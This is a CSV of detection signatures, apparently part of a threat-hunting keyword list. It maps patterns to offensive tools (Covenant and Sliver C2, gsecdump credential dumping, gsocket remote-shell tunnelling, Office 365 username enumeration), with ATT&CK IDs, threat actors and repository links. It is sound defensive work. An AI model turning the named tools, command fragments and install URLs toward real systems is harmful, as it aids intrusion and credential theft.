"*Greenwolf*",".{0,1000}Greenwolf.{0,1000}","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.","T1593 - T1589 - T1195 - T1071","TA0043","N/A","N/A","Reconnaissance","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","N/A","10","3891","799","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z","46703"
"*gremwell/o365enum*",".{0,1000}gremwell\/o365enum.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","46704"
"*grep-through-commits.sh *",".{0,1000}grep\-through\-commits\.sh\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46715"
"*Group3r.cs*",".{0,1000}Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46716"
"*Group3r.exe*",".{0,1000}Group3r\.exe.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46717"
"*Group3r.View.NiceGpoPrinter*",".{0,1000}Group3r\.View\.NiceGpoPrinter.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","46718"
"*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46719"
"*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","46720"
"*GruntInjection.exe*",".{0,1000}GruntInjection\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46722"
"*gruntstager.cs*",".{0,1000}gruntstager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46723"
"*GruntStager.exe*",".{0,1000}GruntStager\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","46724"
"*GS_NETCAT_BIN*",".{0,1000}GS_NETCAT_BIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46725"
"*GS_SO_TOR_DOMAIN*",".{0,1000}GS_SO_TOR_DOMAIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46726"
"*gsecdump-v2b5.exe*",".{0,1000}gsecdump\-v2b5\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46727"
"*G-Security Webshell*",".{0,1000}G\-Security\sWebshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","46728"
"*gserver/gServer.go*",".{0,1000}gserver\/gServer\.go.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","46729"
"*gs-full-pipe -s *",".{0,1000}gs\-full\-pipe\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46730"
"*gs-helloworld gs-pipe gs-full-pipe*",".{0,1000}gs\-helloworld\sgs\-pipe\sgs\-full\-pipe.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46731"
"*gsmith257-cyber/better-sliver*",".{0,1000}gsmith257\-cyber\/better\-sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","1","N/A","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","46732"
"*gs-mount ~/*",".{0,1000}gs\-mount\s\~\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46733"
"*gs-mount -s*",".{0,1000}gs\-mount\s\-s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46734"
"*gs-netcat &*",".{0,1000}gs\-netcat\s\&.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46735"
"*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46736"
"*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46737"
"*gs-netcat *.tar.gz*",".{0,1000}gs\-netcat\s.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46738"
"*gs-netcat.1*",".{0,1000}gs\-netcat\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46739"
"*gs-netcat_freebsd-x86_64*",".{0,1000}gs\-netcat_freebsd\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46740"
"*gs-netcat_linux-aarch64*",".{0,1000}gs\-netcat_linux\-aarch64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46741"
"*gs-netcat_linux-arm*",".{0,1000}gs\-netcat_linux\-arm.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46742"
"*gs-netcat_linux-armhf*",".{0,1000}gs\-netcat_linux\-armhf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46743"
"*gs-netcat_linux-armv6*",".{0,1000}gs\-netcat_linux\-armv6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46744"
"*gs-netcat_linux-armv7l*",".{0,1000}gs\-netcat_linux\-armv7l.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46745"
"*gs-netcat_linux-i686*",".{0,1000}gs\-netcat_linux\-i686.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46746"
"*gs-netcat_linux-mips32*",".{0,1000}gs\-netcat_linux\-mips32.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46747"
"*gs-netcat_linux-mips64*",".{0,1000}gs\-netcat_linux\-mips64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46748"
"*gs-netcat_linux-mipsel*",".{0,1000}gs\-netcat_linux\-mipsel.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46749"
"*gs-netcat_linux-x86_64*",".{0,1000}gs\-netcat_linux\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46750"
"*gs-netcat_macOS*",".{0,1000}gs\-netcat_macOS.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46751"
"*gs-netcat_openbsd-x86_64*",".{0,1000}gs\-netcat_openbsd\-x86_64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46752"
"*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46753"
"*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46754"
"*gsocket -k *",".{0,1000}gsocket\s\-k\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46755"
"*gsocket openvpn *",".{0,1000}gsocket\sopenvpn\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46756"
"*gsocket openvpn --*",".{0,1000}gsocket\sopenvpn\s\-\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46757"
"*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46758"
"*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46759"
"*gsocket*/gsocket.h*",".{0,1000}gsocket.{0,1000}\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46760"
"*GSOCKET*Lclient_gs.log*",".{0,1000}GSOCKET.{0,1000}Lclient_gs\.log.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46761"
"*gsocket.1.html*",".{0,1000}gsocket\.1\.html.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46762"
"*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46763"
"*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46764"
"*gsocket.io/install.sh*",".{0,1000}gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46765"
"*gsocket/gsocket.h*",".{0,1000}gsocket\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46766"
"*gsocket_1.*.deb*",".{0,1000}gsocket_1\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46767"
"*GSOCKET_ARGS=*",".{0,1000}GSOCKET_ARGS\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46768"
"*gsocket_linux-aarch64.tar.gz*",".{0,1000}gsocket_linux\-aarch64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46769"
"*gsocket_linux-arm.tar.gz*",".{0,1000}gsocket_linux\-arm\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46770"
"*gsocket_linux-armv6.tar.gz*",".{0,1000}gsocket_linux\-armv6\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46771"
"*gsocket_linux-armv7l.tar.gz*",".{0,1000}gsocket_linux\-armv7l\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46772"
"*gsocket_linux-i686.tar.gz*",".{0,1000}gsocket_linux\-i686\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46773"
"*gsocket_linux-mips32.tar.gz*",".{0,1000}gsocket_linux\-mips32\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46774"
"*gsocket_linux-mips64.tar.gz*",".{0,1000}gsocket_linux\-mips64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46775"
"*gsocket_linux-mipsel.tar.gz*",".{0,1000}gsocket_linux\-mipsel\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46776"
"*gsocket_linux-x86_64.tar.gz*",".{0,1000}gsocket_linux\-x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46777"
